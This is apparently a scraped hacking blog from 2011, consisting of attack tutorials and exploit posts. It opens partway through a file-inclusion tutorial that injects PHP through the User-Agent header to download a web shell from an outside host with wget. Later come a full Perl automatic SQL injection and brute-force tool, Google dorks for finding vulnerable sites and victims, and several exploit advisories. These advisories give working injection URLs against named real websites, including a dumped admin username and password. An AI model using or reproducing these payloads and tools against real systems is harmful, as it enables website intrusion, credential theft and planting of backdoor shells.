root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ


If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let̢۪s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :


Choose Tamper and in User-Agent filed write the following code :

<?system(wget http://fbi.20x.cc/gov/data/R00TSH3ll.txt -O sh3ll.php);?>
{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don̢۪t work,try exec() because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.


Our shell is successfully uploaded.

All In One Collection Tutorials & Tools Uploaded By sheikh_shahzeb More Than 10 GB

By - sheikh_shahzeb
Infinity Exists Underground and vblog Compete Tutorials

Free File Hosting Made Simple - MediaFire

BT 4 Tutorials

Free File Hosting Made Simple - MediaFire

Milworm Tutorials

Free File Hosting Made Simple - MediaFire

BT Offensive Security Tutorials

Free File Hosting Made Simple - MediaFire

Other Collection of Hacking Videos

Free File Hosting Made Simple - MediaFire

My Ways Of Hacking Go Here

Free File Hosting Made Simple - MediaFire

Must Use Tools in Hacking

Free File Hosting Made Simple - MediaFire

Download BackTrack R2

Free File Hosting Made Simple - MediaFire

Cracking Collection

Free File Hosting Made Simple - MediaFire

join files with winrar and hjsplit

to watch videos use klite media player and codecs

try suspicious files in sandbox or in virtual machine like in vmware for your own security i am sharing vmware also here


Here Is First DVD OF CEH Labs Volume 1

CEH Labs Volume 1

If Ask Any Password type creativemediafire.tk

it takes more than a month to upload but i think usefull for all thats why i am sharing it

100 virus clean learn ethical ways of hacking 

Tuesday, June 21, 2011

Website that has alot of lucid software.

Lucid is part of Ubuntu and Ubuntu is part of Debian.
 So you figure out how it works.
 any ways this is all I got so far with my lucid.
(""" all the software will work with hp mini 210 """)
 you can get aircrack-ng, wireshark, and etc here good luck.

Using Puppy Linux and HP Mini 210.

This combination of software and hardware are almost perfect for hacking, but that requires some sacrifices:lacks no sound, typing, mouse gestures and no support with extra hardware (e.g. wireless key button, sound key button)
It supports many utilities basically if any software is supported in Lucid(Ubuntu> Debian), then it will work.

Backtrack 4 will not support broadcom 43x drivers at all, but puppy linux will support everything that is possible with BC43x chipsets backtrack4 supports sound and just scroll gestures on the touchpad, but it does not support portability.

Monday, June 20, 2011

Running aircrack-ng suite natively on HP-Mini 210-1000

This guide will guide you how to make aircrack-ng suite work with hp-mini 210-1000 Broadcom 4312 to work with aircrack-ng.

FlashDrive (more than 2 GB)
Windows (Already comes with HP mini)
1.) Get YUMI (Win32)
2.) On YUMI, look for Puppy Linux and download.
3.) Create the Live on the USB with YUMI
4.) Make sure your HPMINI BIOS boots USB as the first device.
5.) Boot up Puppy Linux
6.) Select wlan0 (because it supports broadcom :D)
7.) Get any web browser
8.) Download file from http://www.murga-linux.com/puppy/viewtopic.php?t=60202
9.) Read more about aircrack-ng suite
So, thats how you get aircrack-ng to work with hp-mini210 - 1000
it proves that hp-mini is an hacker tool.

Friday, June 17, 2011

How to Hack any Website.

This tutorial was made by Hini Aes, dedecatied to Soumyodeep on facebook.

All computer networks are not 100% secure peroid, but some networks are secure enough from an hacker firstly my topic is about hacking websites so first you want to know what is an exploit in my terms so you will under stand.
Exploit: The weak section of an website. With an exploit you can hack any computer system with exploit sometimes an exploit might seem to be limited, but it can be your adventage of something else maybe but html trojan/or virus.

Deface: to replace code or file of the orginal index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained

SQL Injection Example:


if you get in error in the browser let "error in your MySQL syntax"
 so by putting ' after a .php?value=# and you get error.
then site if vulerable to an SQL Injection.

XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>

Remote & Local File Inclusion.
RFI Exploit.
by using the parametor include=(http://www.haxorz.com/c99.txt
the page file include c99.txt from haxorz.com but if you use .php shell then it will appear on the haxorz.com but its in .txt form then it will load contents from northkoreans.com.
you have to search about that sorry.

register on www.hackforums.net and read tutorials and do them then you will be come an website hacker.

Tuesday, June 14, 2011

Automatic SQL Injection with Brute Force [Perl Script]

The good thing about this script that it is multiplatform and its an auto injection tool so it makes the process faster but i will not always work agaist from an manual sql injection



#                           -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-                   ###
# [+] inf0:                                                                             ###
# It Searchs:                                                                           ###
# ===========                                                                           ###
#  - Nº of columns                                                                      ###        
#  - Information_Schema && MySQL.User                                                   ###
#  - LOAD_FILE                                                                          ###
#  - Tables                                                                             ###                                                
#  - Columns                                                                            ###
#                                                                                       ###
#  ...and save it on a nice text file.                                                  ###
#                                                                                       ###
# [+] Use:                                                                              ###
# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]             ###
#   [WEBSITE]: http://www.web.com/index.php?id=                                         ###
#   [COLUMNS]: Limit of columns to check                                                ###
#   [FILE]: File where save the results                                                 ###
#   [COMMENT]: '/*' or '--' (Without '') (Optional)                                     ###
#   [-T]: Try to brute force tables (Optional)                                          ###
#   [-C]: Try to brute force columns (Optional)                                         ###
#   [-NOCHECK]: Skip the initial check (Optional)                                       ###
# [+] c0ntact:                                                                          ###
# MSN:    no.more@passport.com                                                          ###
# Jabber: login-root@x23.eu                                                             ### 
# E-Mail: login_root@yahoo.com.ar                                                       ###
#                                                                                       ###
# [+] sh0utz:                                                                           ###
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# ARGENTINA PRODUCT :)                                                                  ###
use LWP::Simple;
                 print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";
                 print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
                 print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
                 exit (0);
if ( $ARGV[0]   !~   /^http:/ ) 
      $ARGV[0] = "http://" . $ARGV[0];
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
        $cmn.= "+";
        print "\n[+] Comments to use: '--' & '+'";      
        $cmn.= "/**/";
        $cfin.= "/*";
        print "\n[+] Comments to use: '/*' & '/**/'";
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
      print "\n[!] Skipping the initial check...\n";
      print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
      print "\n[!] Checking if the website is vulnerable...\n";
      $response=get($sql)or die("[-] Wrong Website, check it\n");
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ ||         $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
            print "[+] Vulnerable website, script continues...\n";
            print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
            print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
    if ($column == 0)
          print WEB "\n[COLUMNS]:\n\n";
          $inyection = '';
         $union = '';
   $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
   if($response =~ /loginpwnz/)
        $column ++;
        print "[+] The site has $column columns\n\n";
        print "$sql\n";
        print WEB "$sql\n";
        print "\n[!] Checking if Information_Schema exists...";
        $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
        if($response =~ /loginpwnz/)
                        print "\n[+] Information_Schema available...saving in $ARGV[2]";
           print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
                print "\n[-] Information_Schema unavailable";
        print "\n[!] Checking if MySQL.User exists...";
        $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
        if($response =~ /loginpwnz/)
                        print "\n[+] MySQL.User available...saving in $ARGV[2]";
                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
                print "\n[-] MySQL.User unavailable";
        while ($loadcont < $column-1)
        print "\n[!] Checking if it is possible to inject LOAD_FILE...";
        $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
        if($response =~ /root:x:/)
                        print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
                        print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
                print "\n[-] LOAD_FILE unavailable";
        if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
             print "\n\n[!] Brute forcing tables...";
             print WEB "\n\n[TABLES]:\n\n";
             foreach $tabla(@nombretabla)
                 $response=get($sql)or die("[-] Impossible to get tables\n");
                 if($response =~ /loginpwnz/)
                       print "\n[+] Table $tabla exists...saving in $ARGV[2]";
                       print WEB "$sql\n";
       if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
                print "\n\n[!] Table to brute force columns: ";
           print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
           foreach $columna(@nombrecolumna)
            $response=get($sql)or die("[-] Impossible to get columns\n");
            if ($response =~ /loginpwnz/)
                     print "\n[+] Column $columna available...saving in $ARGV[2]";
                     print WEB "$columna\n";
       print WEB "\n\n\n[*EOF*]";
       print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
       print "## c0ded by Login-Root | 2008 ##\n\n";
       exit (0);
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (0);

Monday, June 13, 2011

important information [dork]

Site: google.com/latitude - This is a free application where you can track
your PC, laptop and mobile, just login there and you will be tracked
freely(used to track yourself live and you can put this in blogs to show
where you are)

I made a dork simply that shows some couple of people, after some years when
this application will grow stronger and you can get tons of victims.



Sensative file [dork] ionCub

This dork views sensative information that may be used for hacking.
dork: inurl:loader-wizard ext:php

[Dork] More Accurute vBulletin installion finder [Dork]

inurl:/install/install.php intitle:vBulletin * Install System

use this with an google based search engine (www.google.com) 

Sunday, May 29, 2011

Nice hacking forum

this guy has some real sh!t going

Alot of useful software for hacking

All his software has coded by him
goto this site, he has alot of nice software and tools don't leech

All in One Tools & Tutorials

goto the link learn to hack by watching and doing it your self.

Saturday, May 28, 2011

Q8Portals SQL Injection Vulnerability

Q8portals [asp] SQL Injection Vulnerability

[+]Title :.......Q8portals [asp] SQL Injection Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Win Xp Sp 2/3
[~]Data :.............2011-05-13
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org & http://Security-War.Com
[~] Vendor: http://www.Q8portals.com
[~] Category:: [webapps]

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: intext:Powered by: q8portals.com

[+] Description: You start using the command having 1 = 1 - name of
first table to find And more using the command (order by )other name
you will find tables

[ I ].   SQL Vulnerability

[+++] Important: For Sql Injection easily program such Havij and use Hmei7



[L!v3 D3m0's]:




12 May 2011 - Vulnerability discovered.
13  May 2011   - Advisory released.

[!] Black Hat Group ./Iranian HackerZ
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
[!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x |
D3adlY & All Iranian HackerZ
[!] Spec Th4nks:  HUrr!c4nE   | Virangar | B3hz4d |  M4Hd1 | Mr.Xhat |
Immortal Boy |
 __SENATOR__ | And All My Friendz
[!] Persian Gulf 4 Ever

Trade Line Web SQLi Vulnerability

Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com 
My inj3ct0r Brothers.:) 
 r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
 XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n 
Note:' i Need botnet Owner friend! ' 
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
                 Example| Exploitation
                 SQL Injecting.. 
                 Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
                 Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan

                    Hm... ok.
                 SQL Injecting..
                 Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
                 Mysql Writes: 1:admin:12345
                    Hmm... ok.
                 SQL Injecting..
                 Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
                 Mysql Writes : 5.0.90


                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                                     Was Here.                HTTP://H4X0RESEC.BLOGSOT.COM

Web Design by ChromeMedia Exploit

0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0

# Title : ChromeMedia SQL Injection Vulnerability
# Author: Kalashinkov3
# Vendor: [www.chromemedia.com]
# Email : kalashinkov3[at]Hotmail[dot].Fr
# Date : 22/05/2011
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?
# Category  : PHP [SQli]       


# http://[localhost]/*/*/article.php?content_id='22
# http://[localhost]/*/*/article.php?content_id=[SQLI]

# http://[localhost]/*/*/details.php?product_id='20
# http://[localhost]/*/*/details.php?product_id=[SQLI]

# all php files "*.php?*_id= " are vulnerable #

^_^ G00d LUCK ALL :=)

# Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day #

Friday, May 27, 2011

frame-oshop Sqli vuln

product:    frame-oshop
vendor:     http://www.sdaxx.de/
date:       15.05.2011
status:     0day
version:    i dunno...
PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12
Dork:       "2006 by Sdaxx Rostock" intitle:"frame-oshop"
Note:       -sessid had to be fresh
        -there are more vuln...
>>published by -SmoG- on SceneGround.info<<
gretz to my mentor Therion, c0x and other sg-members!

SQL Injection MySchool Version 7.02

# Google Dork: "MySchool Version 7.02"
# Date: 05-21-2011
# Software Link: http://em.com.eg/
# Version: Version 7.02
# Author: az7rb
# Tested on : winxp sp3 Ar end bt5
# Homepage : www.p0c.cc
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends
#################### wWw.p0c.cc #####################
# SQL :
# Example :
# SQL 2 :
# Example :
# Link Control Panel :